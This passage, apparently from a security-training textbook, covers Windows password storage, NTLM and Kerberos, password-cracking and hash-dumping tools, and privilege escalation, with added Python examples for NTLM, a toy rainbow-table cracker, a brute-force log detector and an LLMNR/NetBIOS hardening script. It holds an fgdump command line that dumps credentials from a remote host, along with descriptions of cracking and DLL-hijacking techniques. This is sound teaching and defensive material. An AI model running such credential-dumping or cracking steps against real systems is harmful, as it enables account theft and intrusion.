The DNA server interface allows users to manage DNA from a server. The DNA server module provides the user with the status of all jobs that the DNA server is executing. This interface contains:

o Current jobs: The current job queue consists of all jobs added to the list by the controller. The current job list has many columns, such as the identification number assigned by the DNA to the job, the name of the encrypted file, the user's password, the password that matches a key, which can unlock the data, the status of the job, and various other columns.

o Finished jobs: The finished job list provides information about the decryption jobs including the password. The finished job list also has many columns that are similar to the current job list. These columns include the identification number assigned by DNA to the job, the name of the encrypted file, the decrypted path of the file, the key used to encrypt and decrypt the file, the date and time that the DNA server started working on the job, the date and time the DNA server finished working on the job, the elapsed time, and so on.

■ DNA Client Interface

Users can use the DNA client interface from many workstations. The DNA client interface helps coordinate client statistics easily, and is available on machines with the DNA client application pre-installed. It shows many components, such as the name of the DNA client, the name of the group to which the DNA client belongs, the statistics about the current job, and many other components.

Network Management

The Network Traffic dialog box aids in the discovery of the network speed the DNA uses and each work-unit length of the DNA client. Using the work-unit length, a DNA client can work without contacting the DNA server. The DNA client application has the ability to contact the DNA server at the beginning and ending of the work-unit length.

The user can monitor the job status queue and the DNA. After collecting the data from the Network Traffic dialog box, the user can modify the client work-unit length. When the work-unit length increases, the rate of network traffic decreases, and the client spends a longer time working on each job. Therefore, the client makes fewer requests to the server, reducing the network bandwidth consumed.



Password Recovery Tools

Password recovery tools allow attackers to break complex passwords, recover strong encryption keys, and unlock several documents.

■    Elcomsoft Distributed Password Recovery

Source: https://www.elcomsoft.com

The application allows attackers to break complex passwords, recover strong encryption keys, and unlock documents in a production environment. It allows for the execution of mathematically intensive password recovery code on the parallel computational elements found in modern graphic accelerators by employing an innovative technology to accelerate password recovery, when a compatible ATI or NVIDIA graphics card is present in addition to the CPU-only mode. When compared to password recovery methods that use only the computer's main CPU, the GPU acceleration used by this technology makes password recovery faster. This in turn supports password recovery using a variety of applications and file formats.

Some of the password recovery tools are listed below: 

■    Passware Kit Forensic (https://www.passware.com)

■   WINDOWS PASSWORD RECOVERY TOOL ULTIMATE (https://www.tenorshare.com)

■   Stellar Phoenix Password Recovery (https://www.stellarinfo.com)

■   Windows Password Recovery Tool (https://www.windowspasswordsrecovery.com) 

■    PCUnlocker (https://www.top-password.com)

■    iSumsoft Windows Password Refixer (http://www.isumsoft.com) 

■    hashcat (https://hashcat.net)



Microsoft Authentication

When users log in to a Windows computer, a series of steps is performed for user authentication. The Windows operating system authenticates its users with the help of three mechanisms (protocols) provided by Microsoft.

■ Security Accounts Manager (SAM) Database

Windows uses the Security Accounts Manager (SAM) database or the Active Directory database to manage user accounts and passwords in hashed format (one-way hash). The system does not store the passwords in plaintext, but in hashed format, to protect them from attacks. The system implements the SAM database as a registry file, and the Windows kernel obtains and keeps an exclusive file system lock on the SAM file. Because of this lock, the file has some measure of security for the storage of passwords.

It is not possible to copy the SAM file to another location in the case of online attacks. Because the system locks the SAM file with an exclusive file system lock, a user cannot copy or move it while Windows is running. The lock will not release until the system throws a blue screen exception or the operating system has shut down. However, to make the password hashes available for offline brute-force attacks, attackers can dump the on-disk contents of the SAM file using various techniques. The SAM file uses a SYSKEY function (in Windows NT 4.0 and later versions) to partially encrypt the password hashes.

Even if hackers use subterfuge techniques to discover the file's contents, the one-way hashed and encrypted values make the passwords difficult to recover. In addition, some versions have a secondary key, making the encryption specific to that copy of the OS.


■    NTLM Authentication

NTLM (NT LAN Manager) is a default authentication scheme that performs authentication using a challenge/response strategy. Because it does not rely on any official protocol specification, there is no guarantee that it works correctly in every situation. It has been used on some Windows installations, where it worked successfully. NTLM authentication consists of two protocols: the NTLM authentication protocol and the LM authentication protocol. These protocols use different hash methodologies to store users' passwords in the SAM database.

■    Kerberos Authentication

Kerberos is a network authentication protocol that provides strong authentication for client/server applications by using secret-key cryptography. This provides mutual authentication, in that both the server and the user verify each other's identity. Messages sent through Kerberos protocol are protected against replay attacks and eavesdropping.

Kerberos makes use of the Key Distribution Center (KDC), a trusted third party. This consists of two logically distinct parts: an Authentication server (AS) and a Ticket Granting Server (TGS). Kerberos uses "tickets" to prove a user's identity.

Microsoft has upgraded its default authentication protocol to Kerberos which provides a stronger authentication for client/server applications than NTLM.


How Hash Passwords Are Stored in Windows SAM?

Windows operating systems use a Security Account Manager (SAM) database file to store user passwords. The SAM file is stored at %SystemRoot%\system32\config\SAM on Windows systems, and Windows mounts it in the registry under the HKLM\SAM registry hive. It stores LAN Manager (LM) or NT LAN Manager (NTLM) hashed passwords.

NTLM supersedes the LM hash, which is susceptible to cracking. New versions of Windows still support LM hashes for backward compatibility; however, Vista and later Windows versions disable LM hash by default. The LM hash is blank in newer Windows versions. Selecting the option to remove LM hashes enables an additional check during password change operations but does not clear LM hash values from the SAM immediately: The SAM file stores a "dummy" value in its database, which bears no relationship to the user's actual password and is the same for all user accounts. It is not possible to calculate LM hashes for passwords exceeding 14 characters in length. Thus, the LM hash value is set to a "dummy" value when a user or administrator sets a password of more than 14 characters.


NTLM Authentication Process

NTLM includes three methods of challenge-response authentication: LM, NTLMv1, and NTLMv2, all of which use the same technique for the authentication process. The only difference among them is the level of encryption. In NTLM authentication, the client and server negotiate an authentication protocol. This is accomplished through the Microsoft Negotiate Security Support Provider (SSP).

The following steps demonstrate the process and the flow of the client authentication to a domain controller using any NTLM protocol:

■   The client types the user name and password into the logon window.

■   Windows runs the password through a hash algorithm and generates a hash for the password that has been entered in the logon window.

■   The client computer sends a login request along with domain name to the domain controller.

■   The domain controller generates a 16-byte random character string called a "nonce" and sends it to the client computer.

■   The client computer encrypts the nonce with a hash of the user password and sends it back to the domain controller.

■ The domain controller retrieves the hash of the user password from the SAM and uses it to encrypt the nonce. The domain controller then compares the encrypted value with the value received from the client. A matching value authenticates the client and the logon is successful.

Note: Microsoft has upgraded its default authentication protocol to Kerberos, which provides a stronger authentication for client/server applications than NTLM.
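The six steps above as a runnable model in Python. This is an added example written for this section, not Microsoft's code and not the real NTLM wire format: the stored hash and the keyed nonce transform are stand-ins (SHA-256 and HMAC-SHA256, assumed for the model), and the DomainController, logon and replay names are invented. It shows what actually crosses the wire, that the password and its hash never do, and why re-sending a response captured from an earlier logon (the replay attack described under passive online attacks) fails: the domain controller issues a fresh nonce for every logon and consumes it after one attempt.

```python
import hashlib
import hmac
import os


def password_hash(password: str) -> bytes:
    """One-way hash of the password as stored on the domain controller.
    Constructed stand-in for the real LM/NTLM hash functions."""
    return hashlib.sha256(password.encode("utf-16-le")).digest()


def compute_response(pw_hash: bytes, nonce: bytes) -> bytes:
    """Keyed transform of the nonce using the password hash. Both sides run
    this, so the plaintext password never leaves the client."""
    return hmac.new(pw_hash, nonce, hashlib.sha256).digest()


class DomainController:
    """Server side: knows only password hashes and issues one nonce per logon."""

    def __init__(self, accounts: dict):
        # accounts is {user: password}; only the hash is retained (step 6 reads it)
        self.hashes = {user: password_hash(pw) for user, pw in accounts.items()}
        self.pending = {}  # user -> outstanding 16-byte nonce

    def challenge(self, user: str) -> bytes:
        nonce = os.urandom(16)          # step 4: 16-byte random nonce
        self.pending[user] = nonce
        return nonce

    def verify(self, user: str, response: bytes) -> bool:
        nonce = self.pending.pop(user, None)  # a nonce is consumed by one attempt
        if nonce is None or user not in self.hashes:
            return False
        expected = compute_response(self.hashes[user], nonce)   # step 6
        return hmac.compare_digest(expected, response)


def logon(dc: DomainController, user: str, password: str, trace=None):
    """Run the exchange; returns (success, nonce, response) and optionally
    records the messages that cross the wire."""
    nonce = dc.challenge(user)                                   # steps 3-4
    response = compute_response(password_hash(password), nonce)  # steps 2 and 5
    ok = dc.verify(user, response)                               # step 6
    if trace is not None:
        trace += [("client->dc", "logon " + user),
                  ("dc->client", "nonce " + nonce.hex()),
                  ("client->dc", "response " + response.hex()),
                  ("dc->client", "authenticated" if ok else "denied")]
    return ok, nonce, response


def replay(dc: DomainController, user: str, captured_response: bytes) -> bool:
    """An eavesdropper re-sends a response captured from an earlier logon.
    The DC answers with a new nonce, so the old response cannot match."""
    dc.challenge(user)
    return dc.verify(user, captured_response)


if __name__ == "__main__":
    dc = DomainController({"alice": "correct horse battery"})   # constructed account
    wire = []
    ok, _, resp = logon(dc, "alice", "correct horse battery", wire)
    for direction, msg in wire:
        print(f"{direction:12} {msg}")
    print("replay of captured response accepted:", replay(dc, "alice", resp))
```

Note what the verifier needs: only the stored hash and the nonce. That is why the SAM section above stresses protecting the hash database as carefully as the passwords themselves.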


Kerberos Authentication

Kerberos is a network authentication protocol that provides strong authentication for client/server applications by using secret-key cryptography, which provides a mutual authentication. Both the server and the user verify each other's identity. Messages sent through the Kerberos protocol are protected against replay attacks and eavesdropping.

Kerberos makes use of the Key Distribution Center (KDC), a trusted third party, which consists of two logically distinct parts: an Authentication Server (AS) and a Ticket Granting Server (TGS). The authorization mechanism of Kerberos provides the user with a Ticket Granting Ticket (TGT) that serves, after authentication, for later access to specific services. This gives Single Sign-On, by which the user need not re-enter the password to access any authorized service. It is important to note that there is no direct communication between the application servers and the KDC; the service tickets, even though they are packed by the TGS, reach the service only through the client that wants to access it.


Password Salting

Password salting is a technique where random strings of characters are added to the password before calculating their hashes. This makes it more difficult to reverse the hashes and defeats pre-computed hash attacks. The longer the random string, the harder it becomes to break or crack the password. The random string of characters should be a combination of alphanumeric characters.

In cryptography, a "salt" consists of random data bits used as one input to a one-way function, the other being a password. Instead of passwords, the output of the one-way function can be stored and used to authenticate users. A key derivation function combines the salt with a password to generate a key for use with a cipher or other cryptographic algorithm. This technique generates different hashes for the same password, which makes cracking the passwords difficult.
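To make the time-memory trade-off from the Rainbow Table Attack section concrete, and to show why the salting just described defeats it, here is a toy rainbow table in Python written for this page; it is an added example, not code from the page or from RainbowCrack. It builds chains over a tiny constructed password space (3 lowercase letters hashed with unsalted MD5; CHAIN_LEN and CHAIN_NUM are assumed toy values playing the role of rtgen's chain_len and chain_num), recovers a password from its bare hash by walking the chains, and then runs the same lookup against a value stored with a random per-user salt through a key derivation function (PBKDF2, an assumed choice), where the precomputed table finds nothing.

```python
import hashlib
import os

# Toy parameters (assumed): lowercase, 3-character passwords, 26**3 = 17,576 candidates.
CHARSET = "abcdefghijklmnopqrstuvwxyz"
PLAINTEXT_LEN = 3
SPACE = len(CHARSET) ** PLAINTEXT_LEN
CHAIN_LEN = 50      # hashes per chain (rtgen: chain_len)
CHAIN_NUM = 800     # chains in the table (rtgen: chain_num)


def hash_pw(password: str) -> bytes:
    """The unsalted hash the table is built for (MD5 in this toy)."""
    return hashlib.md5(password.encode()).digest()


def index_to_plaintext(n: int) -> str:
    """Map an integer in [0, SPACE) to a candidate password."""
    chars = []
    for _ in range(PLAINTEXT_LEN):
        chars.append(CHARSET[n % len(CHARSET)])
        n //= len(CHARSET)
    return "".join(chars)


def reduce_fn(digest: bytes, column: int) -> str:
    """Reduction function: map a hash back into the password space. Mixing in
    the column index gives each column its own reduction, which is what makes
    this a rainbow table and limits chain merges."""
    return index_to_plaintext((int.from_bytes(digest[:8], "big") + column) % SPACE)


def default_seeds() -> list:
    """Deterministic, distinct chain start points (7919 is coprime with SPACE)."""
    return [index_to_plaintext((i * 7919) % SPACE) for i in range(CHAIN_NUM)]


def build_table(seeds) -> dict:
    """Precompute the chains; only endpoint -> startpoint is stored, the memory
    side of the trade-off. Intermediate values are recomputed at lookup time."""
    table = {}
    for start in seeds:
        pw = start
        for col in range(CHAIN_LEN):
            pw = reduce_fn(hash_pw(pw), col)
        table.setdefault(pw, start)  # merged chains: keep the first one stored
    return table


def lookup(table: dict, target: bytes):
    """Recover the password behind an unsalted hash, or None if the table misses."""
    for col in range(CHAIN_LEN):
        # Assume the target sits at `col`; walk the remainder of the chain to its end.
        pw = reduce_fn(target, col)
        for c in range(col + 1, CHAIN_LEN):
            pw = reduce_fn(hash_pw(pw), c)
        start = table.get(pw)
        if start is None:
            continue
        # Endpoint is known: regenerate that chain from its start and look for the hash.
        pw = start
        for c in range(CHAIN_LEN):
            if hash_pw(pw) == target:
                return pw
            pw = reduce_fn(hash_pw(pw), c)
        # Otherwise a false alarm: a different chain ended at the same point.
    return None


def coverage(table: dict, sample) -> float:
    """Fraction of sample passwords the table recovers; every hit is verified."""
    hits = 0
    for pw in sample:
        found = lookup(table, hash_pw(pw))
        assert found is None or hash_pw(found) == hash_pw(pw)
        hits += found is not None
    return hits / len(sample)


def salted_hash(password: str, salt: bytes) -> bytes:
    """Defender's side: random per-user salt fed through a KDF. The stored value
    is no longer hash_pw(password), so a table built in advance cannot match it."""
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)


if __name__ == "__main__":
    table = build_table(default_seeds())
    sample = [index_to_plaintext((i * 4099 + 13) % SPACE) for i in range(200)]
    print(f"{len(table)} chains stored; recovers {coverage(table, sample):.0%} of a 200-password sample")
    print("unsalted 'key' ->", lookup(table, hash_pw("key")))
    print("salted   'key' ->", lookup(table, salted_hash("key", os.urandom(16))))
```

The table covers far fewer than CHAIN_LEN * CHAIN_NUM passwords because chains merge, which is the trade-off rtgen's parameters tune. With a salt, the attacker would need a separate table per salt value, which is exactly the precomputation the technique was meant to avoid.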


Tools to Extract the Password Hashes

Use the following tools to extract the password hashes from the target system:

■    pwdump7

Source: https://www.tarasco.org

pwdump7 is an application that dumps the password hashes (One Way Functions, or OWFs) from NT's SAM database. pwdump extracts LM and NTLM password hashes of local user accounts from the Security Account Manager (SAM) database. The tool works by extracting the binary SAM and SYSTEM files from the file system, and then extracting the hashes from them. One of the powerful features of pwdump7 is that it is also capable of dumping protected files. pwdump7 is also able to extract passwords offline by selecting the target files. Use of this program requires administrative privileges on the remote system.

■   fgdump

Source: http://foofus.net

Fgdump is a utility for dumping passwords on Windows NT/2000/XP/2003/Vista machines. It comes with built-in functionality that has all the capabilities of PWdump and can do a number of other crucial things such as execute a remote executable and dump the protected storage to a remote or local host, as well as grab cached credentials.

Example: fgdump.exe -h 192.168.0.10 -u AnAdministrativeUser -p l4mep4ssw0rd

Note: Use of the above tools requires administrative privileges on the remote system.


Password Cracking Tools: L0phtCrack and ophcrack

Password cracking tools allow you to reset unknown or lost Windows local administrator, domain administrator, and other user account passwords. In the case of forgotten passwords, they even allow users to regain access to their locked computer instantly without reinstalling Windows. Attackers can use password cracking tools to crack the passwords of the target system. Listed below are a few password cracking tools.

■ L0phtCrack

Source: http://www.l0phtcrack.com

L0phtCrack is a password auditing and recovery application. It recovers lost Microsoft Windows passwords with the help of dictionary, hybrid, rainbow table, and brute-force attacks, and it also checks the strength of passwords. L0phtCrack helps to disclose the security defects that are inherent in the Windows password authentication system.

Some of its important features include scheduling, hash extraction from 64-bit Windows versions, multiprocessor algorithms, and networks monitoring and decoding.

Features:

o Operates on networks with Windows systems, including 32- and 64-bit environments, as well as most BSD and Linux variants with an SSH daemon

o Performs scheduled scans depending on the organization's auditing requirements

o Offers remediation assistance to system administrators on how to take action against accounts that have poor passwords on Windows systems

o Provides a better user interface with more information about each user account, including password age, lock-out status, and whether the account is disabled, expired, or never expires

o Displays real-time reports in a separate, tabbed interface and displays auditing results based on the auditing method, risk severity, and password character sets

o Displays password risk status in four different categories: Empty, High Risk, Medium Risk, and Low Risk

o Reports the completion of the various password character sets being audited, including Alpha, Alphanumeric, Alphanumeric/Symbol, and Alphanumeric/Symbol/International

o Reports the overall length of the discovered password by account

o Delivers summary report of password statistics such as Locked, Disabled, Expired, or if the password is older than 180 days

o Delivers an audit summary of the number of accounts cracked and the number of domains audited

o Cracks foreign passwords using foreign character sets for brute-force attacks, as well as foreign dictionary files

■ ophcrack

Source: http://ophcrack.sourceforge.net

ophcrack is a Windows password cracking tool that uses rainbow tables for cracking passwords. It comes with a graphical user interface and runs on different operating systems such as Windows, Linux/Unix, etc.

Features:

o Cracks LM and NTLM hashes

o Brute-force module for simple passwords

o Real-time graphs to analyze the passwords

o Dumps and loads hashes from an encrypted SAM recovered from a Windows partition


Password Cracking Tools

■ RainbowCrack

Source: http://project-rainbowcrack.com

RainbowCrack cracks hashes with rainbow tables, using a time-memory tradeoff algorithm. A traditional brute-force cracker cracks hashes differently than a time-memory-tradeoff hash cracker. The brute-force hash cracker tries all possible plaintexts one by one during cracking, whereas RainbowCrack pre-computes all possible plaintext/hash pairs for the selected hash algorithm, charset, and plaintext length in advance and stores them in the "rainbow table" file. It may take a long time to pre-compute the tables, but once the pre-computation is finished, you will be able to crack the cipher text in the rainbow tables easily and quickly.

Features:

o Runs on Windows and Linux operating systems

o Provides full time-memory tradeoff tool suites, including rainbow table generation, sort, conversion, and lookup

o Offers a unified rainbow table file format on all supported operating systems

o Includes a command-line user interface and a graphical user interface

o Supports computation on multi-core processors

o Supports rainbow tables:

•    For LM, NTLM, MD5 and SHA1 hash algorithms

•    In raw file format (.rt) and compact file format (.rtc) of any charset


Some of the password cracking tools are listed below:

■    Cain & Abel (http://www.oxid.it)

■ Windows Password Recovery Tool (https://www.windowspasswordsrecovery.com)

■   Windows Password Key (https://www.lostwindowspassword.com)

■    hashcat (https://hashcat.net)

■    Passware Kit Forensic (https://www.passware.com)

■   John the Ripper (http://www.openwall.com)

■   THC-Hydra (https://github.com)

■    InsidePro (http://www.insidepro.com)

■    HashKiller.co.uk (https://hashkiller.co.uk)

■    LSASecretsView (http://www.nirsoft.net)

■    Password Cracker (http://www.amlpages.com)

■   Windows Password Recovery (https://www.passcape.com)

■    Password Recovery Bundle (https://www.top-password.com)

■   JRecoverer Database Bundle (http://www.lcpsoft.com)

■    Hash Suite (http://hashsuite.openwall.net)

■    Medusa (http://foofus.net)

■    Password Unlocker Bundle (https://www.passwordunlocker.com)

■    Offline NT Password & Registry Editor (https://pogostick.net)

■    Proactive System Password Recovery (https://www.elcomsoft.com)

■    krbpwguess (http://www.cqure.net)


How to Defend against Password Cracking?

Best practices to protect against password cracking include:

■    Enable information security audit to monitor and track password attacks

■    Do not use the same password during password change

■    Do not share passwords

■    Do not use passwords that can be found in a dictionary

■    Do not use cleartext protocols and protocols with weak encryption

■    Set the password change policy to 30 days

■   Avoid storing passwords in an unsecured location

■    Do not use any system's default passwords

■ Make passwords hard to guess by using 8 to 12 characters that combine uppercase and lowercase letters, numbers, and symbols. The more complex the password, the less it is subject to attacks.

■ Ensure that applications neither store passwords to memory nor write them to disk in clear text. Passwords are always vulnerable to theft if they are stored in memory. Once the password becomes known, it is very easy for attackers to escalate their rights in the application.

■ Use a random string (salt) as a password prefix or suffix before hashing. This nullifies pre-computation and memorization. Because the salt is usually different for each individual, it is impractical for attackers to construct tables with a single hashed version of each candidate password. UNIX systems traditionally use a 12-bit salt.

■ Enable SYSKEY with a strong password to encrypt and protect the SAM database. Usually, the password information of user accounts is stored in the SAM database. It is very easy for password-cracking software to target the SAM database for accessing passwords. SYSKEY protects password information stored in the SAM data against password-cracking software through strong encryption techniques. It is more difficult to crack encrypted passwords than unencrypted ones.

■ Never use personal information (e.g., birth date, or a spouse's, child's, or pet's name) to create passwords. Otherwise, it becomes quite easy for those close to you to crack those passwords.

■ Monitor the server's logs for brute-force attacks on user accounts. Though brute-force attacks are difficult to stop, they are easily detectable by monitoring the web server log. For each unsuccessful login attempt, an HTTP 401 status code is recorded in the web server logs.

■    Lock out an account that has been subjected to too many incorrect password guesses. This provides protection against brute-force and guessing attacks.

■ Many password sniffers can be successful if LAN manager and NTLM authentication are used. Disable LAN manager and NTLM authentication protocols only after making sure that it does not affect the network.

■    Perform a periodic audit of passwords in the organization.

■    Check any suspicious application that stores passwords in memory or writes them to disk.

■    Unpatched systems can reset passwords during buffer overflow or Denial of Service attacks. Make sure to update the system.

■    Examine whether the account is in use, deleted or disabled. Disable the user account if multiple failed login attempts are detected.

■    Enable account lockout with a certain number of attempts, counter time, and lockout duration.

■    One of the most effective ways to manage passwords in organizations is to set an automated password reset.

■    Make the system BIOS password-protected, particularly on devices that are susceptible to physical threats, such as servers and laptops.
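A small detector for the brute-force symptom described in the list above (a run of HTTP 401 responses from one source in the web server log), as an added Python example that is not drawn from the page. It parses Apache/nginx combined-format lines and flags any client IP that produces at least `threshold` 401 responses inside a sliding one-minute window, reporting the account names tried. The log lines, IP addresses (taken from the documentation ranges) and user names are constructed for the example.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Apache/nginx "combined" format; referer and user-agent after the size are ignored.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)
TS_FORMAT = "%d/%b/%Y:%H:%M:%S %z"

# Constructed sample: one legitimate user with a single typo (and another much
# later), and one source that tries several account names in quick succession.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Oct/2023:13:55:36 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.7 - bob [10/Oct/2023:13:55:50 +0000] "GET /private/ HTTP/1.1" 401 381 "-" "Mozilla/5.0"
203.0.113.7 - bob [10/Oct/2023:13:56:02 +0000] "GET /private/ HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
198.51.100.23 - admin [10/Oct/2023:13:57:01 +0000] "GET /admin/ HTTP/1.1" 401 381 "-" "curl/8.0"
198.51.100.23 - admin [10/Oct/2023:13:57:07 +0000] "GET /admin/ HTTP/1.1" 401 381 "-" "curl/8.0"
198.51.100.23 - root [10/Oct/2023:13:57:13 +0000] "GET /admin/ HTTP/1.1" 401 381 "-" "curl/8.0"
198.51.100.23 - root [10/Oct/2023:13:57:19 +0000] "GET /admin/ HTTP/1.1" 401 381 "-" "curl/8.0"
198.51.100.23 - administrator [10/Oct/2023:13:57:25 +0000] "GET /admin/ HTTP/1.1" 401 381 "-" "curl/8.0"
198.51.100.23 - administrator [10/Oct/2023:13:57:31 +0000] "GET /admin/ HTTP/1.1" 401 381 "-" "curl/8.0"
203.0.113.7 - bob [10/Oct/2023:14:30:00 +0000] "GET /private/ HTTP/1.1" 401 381 "-" "Mozilla/5.0"
"""


def parse_line(line: str):
    """Return a dict for a combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], TS_FORMAT)
    rec["status"] = int(rec["status"])
    return rec


def detect_bruteforce(lines, threshold=5, window=timedelta(minutes=1)):
    """Flag client IPs that produce at least `threshold` 401s within `window`.
    Lines are assumed to be in time order, as a live log is. Returns
    {ip: {"first_401": ts, "total_401": n, "users": [...]}} for flagged IPs."""
    recent = defaultdict(deque)   # ip -> timestamps of 401s still inside the window
    first = {}
    total = defaultdict(int)
    users = defaultdict(set)
    flagged = set()
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["status"] != 401:
            continue
        ip, ts = rec["ip"], rec["ts"]
        first.setdefault(ip, ts)
        total[ip] += 1
        users[ip].add(rec["user"])
        q = recent[ip]
        q.append(ts)
        while ts - q[0] > window:     # drop 401s that have fallen out of the window
            q.popleft()
        if len(q) >= threshold:
            flagged.add(ip)
    return {ip: {"first_401": first[ip], "total_401": total[ip],
                 "users": sorted(users[ip])} for ip in flagged}


if __name__ == "__main__":
    for ip, info in detect_bruteforce(SAMPLE_LOG.splitlines()).items():
        print(f"ALERT {ip}: {info['total_401']} x 401 since {info['first_401']}, "
              f"accounts tried: {', '.join(info['users'])}")
```

The threshold and window are assumed starting points; tune them against normal mistyping rates before acting on alerts, and pair the detection with the account lockout policy listed above so a flagged source is slowed down as well as reported.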



How to Defend against LLMNR/NBT-NS Poisoning

The easiest way to prevent a system from being attacked in this manner is to disable both the LLMNR and NBT-NS services in the Windows operating system. Attackers make use of these services to obtain user credentials and gain unauthorized access to the user's system.

Steps to disable LLMNR/NBT-NS in any version of Windows:

- Disabling LLMNR

o Open Local Group Policy Editor.

o Navigate to Local Computer Policy -> Computer Configuration -> Administrative Templates -> Network -> DNS Client.

o In DNS Client, double-click Turn off multicast name resolution.

o Select the Disabled radio button and then click OK.

- Disabling NBT-NS

o Open Control Panel, navigate to Network and Internet -> Network and Sharing Center, and click the Change adapter settings option on the right side.

o Right-click on the network adapter and click Properties, select TCP/IPv4 and then click Properties.

o Under the General tab, click Advanced and open the WINS tab.

o From the NetBIOS options, select the "Disable NetBIOS over TCP/IP" radio button and click OK.
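The same two settings applied from a script instead of the Group Policy and Control Panel dialogs, as an added Python example that is not part of the page. It writes the registry values those dialogs write: EnableMulticast = 0 under the DNS Client policy key, which is the value stored when multicast name resolution (LLMNR) is turned off, and NetbiosOptions = 2 ("Disable NetBIOS over TCP/IP") for every Tcpip_{GUID} interface under the NetBT service. The function names are invented; the script must run as Administrator on Windows, and --apply is an assumed flag for writing (without it the script only audits and reports).

```python
import sys

# Policy value behind "Turn off multicast name resolution" (LLMNR).
LLMNR_KEY = r"SOFTWARE\Policies\Microsoft\Windows NT\DNSClient"
LLMNR_VALUE = ("EnableMulticast", 0)             # 0 = LLMNR off

# NetBIOS over TCP/IP is configured per interface:
# NetbiosOptions 0 = use DHCP setting, 1 = enabled, 2 = disabled.
NETBT_KEY = r"SYSTEM\CurrentControlSet\Services\NetBT\Parameters\Interfaces"
NETBT_VALUE = ("NetbiosOptions", 2)


def plan_changes(interface_subkeys):
    """Return (subkey, value name, DWORD) triples that disable both services,
    given the interface subkeys found under NETBT_KEY (named Tcpip_{GUID})."""
    changes = [(LLMNR_KEY,) + LLMNR_VALUE]
    for sub in interface_subkeys:
        if sub.startswith("Tcpip_"):
            changes.append((NETBT_KEY + "\\" + sub,) + NETBT_VALUE)
    return changes


def list_netbt_interfaces():
    """Enumerate the per-interface subkeys under NETBT_KEY (Windows only)."""
    import winreg
    with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, NETBT_KEY) as key:
        count = winreg.QueryInfoKey(key)[0]
        return [winreg.EnumKey(key, i) for i in range(count)]


def apply_changes(changes):
    """Write the values; needs an elevated prompt. CreateKeyEx creates the
    policy key when no GPO has written it yet."""
    import winreg
    for subkey, name, value in changes:
        with winreg.CreateKeyEx(winreg.HKEY_LOCAL_MACHINE, subkey, 0,
                                winreg.KEY_SET_VALUE) as key:
            winreg.SetValueEx(key, name, 0, winreg.REG_DWORD, value)


def audit(changes):
    """Read every planned value back: {subkey\\name: current value or None}."""
    import winreg
    state = {}
    for subkey, name, _ in changes:
        try:
            with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, subkey) as key:
                state[subkey + "\\" + name] = winreg.QueryValueEx(key, name)[0]
        except FileNotFoundError:       # key or value absent: service still enabled
            state[subkey + "\\" + name] = None
    return state


def compliant(state, changes) -> bool:
    """True only if every planned value is already set as intended."""
    return all(state.get(sub + "\\" + name) == value for sub, name, value in changes)


if __name__ == "__main__":
    if sys.platform != "win32":
        sys.exit("run on Windows from an elevated prompt")
    plan = plan_changes(list_netbt_interfaces())
    if "--apply" in sys.argv:
        apply_changes(plan)
    state = audit(plan)
    for path, value in state.items():
        print(f"{str(value):>4}  {path}")
    print("compliant" if compliant(state, plan) else "NOT compliant")
```

On a domain-joined machine a Group Policy refresh will overwrite a locally written policy value, so there the LLMNR setting should be delivered through the domain GPO; the per-interface NetBIOS value is not a policy key and stays as written. Run the audit part periodically to catch interfaces added after hardening, since each new adapter gets its own Tcpip_{GUID} subkey.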


Escalating Privileges

Escalating privileges is the second stage of system hacking. Attackers use passwords obtained in the first step to gain access to the target system and then try to attain higher-level privileges in the system. The following topics explain various tools and techniques attackers use to escalate their privileges.



Privilege Escalation

Privileges are a security role assigned to users for using specific programs, features, operating system functions, files, code, and so on, limiting what different types of users can access. A user assigned more privileges can modify or interact with parts of the system or application that are restricted to less privileged users. Attackers first gain system access with fewer privileges, and then try to gain more privileges to perform activities restricted to less privileged users. A privilege escalation attack is the process of gaining more privileges than were initially acquired.

In a privilege escalation attack, attackers first gain access to the network using a non-admin user account, and then try to gain administrative privileges. Attackers take advantage of design flaws, programming errors, bugs, and configuration oversights in the OS and software application to gain administrative access to the network and its associated applications.

Once an attacker has gained access to a remote system with a valid username and password, he/she will attempt to escalate the user account to one with increased privileges, such as that of an administrator, to perform restricted operations. These privileges allow the attacker to view critical/sensitive information, delete files, or install malicious programs such as viruses, Trojans, worms, etc.

Types of Privilege Escalation

Privilege escalation is required when you want to access system resources that you are not authorized to access. Privilege escalation takes place in two forms. They are vertical privilege escalation and horizontal privilege escalation.

■ Horizontal Privilege Escalation: In a horizontal privilege escalation, the unauthorized user tries to access the resources, functions, and other privileges that belong to the authorized user who has similar access permissions. For instance, online banking user A can easily access user B's bank account.

■ Vertical Privilege Escalation: In a vertical privilege escalation, the unauthorized user tries to gain access to the resources and functions of the user with higher privileges, such as application or site administrators. For example, someone performing online banking can access the site using administrative functions.


Privilege Escalation Using DLL Hijacking

Most Windows applications do not use a fully qualified path when loading an external DLL; instead, they first search the directory from which they were loaded. Taking advantage of this, if attackers can place a malicious DLL in the application directory, the application will execute the malicious DLL in place of the real one. For example, if an application program.exe needs library.dll (usually in the Windows system directory) and fails to specify the path to library.dll, Windows will search for the DLL in the directory from which the application was launched. If an attacker has already placed a DLL of that name in the same directory as program.exe, that malicious DLL will load instead of the real DLL, which allows the attacker to gain remote access to the target system.



Privilege Escalation by Exploiting Vulnerabilities

A vulnerability is the existence of a weakness, or a design or implementation error, that can lead to an unexpected event compromising the security of the system. An attacker takes advantage of such vulnerabilities to perform attacks on the confidentiality, availability, or integrity of a system. Software design flaws and programming errors lead to security vulnerabilities. Attackers exploit these software vulnerabilities, such as programming flaws in a program, a service, the operating system, or the kernel, to execute malicious code. Exploiting software vulnerabilities allows attackers to execute a command or binary on a target machine to gain higher privileges than they already have or to bypass security mechanisms. Using these exploits, attackers can even access privileged user accounts and credentials.

